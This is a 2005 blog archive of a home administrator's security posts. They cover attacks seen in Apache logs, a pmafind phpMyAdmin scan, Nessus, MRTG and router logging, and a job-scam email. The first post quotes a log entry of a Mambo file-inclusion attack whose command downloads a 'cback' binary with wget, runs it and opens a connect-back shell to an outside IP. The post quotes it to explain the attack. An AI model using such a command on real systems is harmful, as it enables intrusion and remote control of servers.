Security: November 2005 Archives

Script Kiddies attack my Linux/Apache box

By
Larry
on November 30, 2005 5:09 AM | | Comments (0) | TrackBacks (0)

I am seeing attacks on popular open-source software that runs on linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"

(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->

At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.

It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

A New Attack

By
Larry
on November 29, 2005 12:49 PM | | Comments (0) | TrackBacks (1)

Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.



The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"



Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.



More attacks to come...

Nessus: Security Scanning on Linux and Windows

By
Larry
on November 18, 2005 9:32 AM | | Comments (0) | TrackBacks (0)

There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)


Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.


What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.


So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)


Competing products have sexier interfaces and reports, but they cost a lot more.

MRTG, Linksys, Linux and Apache

By
Larry
on November 14, 2005 12:27 PM | | Comments (0) | TrackBacks (0)

I have put my Linux box to good use, installing MRTG and monitoring the bandwidth usage of my router. It turned out to be a little less simple than I thought, and I also bricked my old Linksys router. The Linksys BEFVP41 v.1 had SNMP and access log sending. Its first replacement, the BEFVP41 v.2 has access log sending but no SNMP. Thus I'm up to a Netopia R9100 that was lying around, which has SNMP, but remote syslog for router activity only.


I also bought a nice new Linksys WRT54GS v.3, which I have modded with a couple of different custom firmware developments. So far, the DD-WRT has some stability issues, so I'm still trying to choose.


What I really want is a complete access log that I can check for patterns. I want to be able to see all the traffic hitting my external interface. Do I really have to buy something like a Watchguard X5 to do this?

I also figured out how to do remote syslog after some vexation. There are actually two syslog configuration files, one in /etc and the other in /etc/sysconfig. (The man pages fail to mention the difference...) With the localx config in /etc and the -r option in /etc/sysconfig, my router (Netopia R9100) now logs all firewall violations to /var/log/router.log . Sweet. Now I just need something to parse it, although it's interesting to just keep a tail -f open.

Job Fraud

By
Larry
on November 8, 2005 3:30 PM | | Comments (0) | TrackBacks (0)

With so many people using the Internet to look for new and better jobs, a new Internet scam has begun. I keep getting emails like this:


Your resume came to us through one of our partners and we would like to set an appointment to meet with you. Albert & Alexander Associates helps direct senior executives and managers to the best jobs in the Washington DC area. We steward our clients careers, maximizing their earning potential and job satisfaction.
If you are interested in learning more, please visit  (link) and complete our assessment. Someone will contact you shortly if we feel we can be of assistance.
Best Regards,
Albert & Alexander Associates

This is different from other, legitimate job emails from comanies and recruiters I would love to work with. These guys are like Bernard Haldane, who have been caught ripping job seekers off with the promise of uncovering the "secret job market." The saddest parts are the misspellings in the subject line: "We recieved your resume" and how the return address ( washingtoncareers@gmail.com ) doesn't work.So Monster-résumé-posters beware, there is a new way for scam artists to find you. What makes this suspicious?



  •  There's no specific job listed.

  • No pre-screen questions: US citizen, clearance, how much $ you want.

  • The "assessment" requires your salary from every job on your résumé.

  • Lack of specifics.

  • Lack of contactibility of recruiters. The real recruiters I've spoken with are efficient, polite, and quick to respond.

  • Return email is a gmail address, even though this outfit has its own domain.

Main Index | Archives | Security: December 2005 »

Search

About this Archive

This page is a archive of entries in the Security category from November 2005.

Security: December 2005 is the next archive.

Find recent content on the main index or look in the archives to find all content.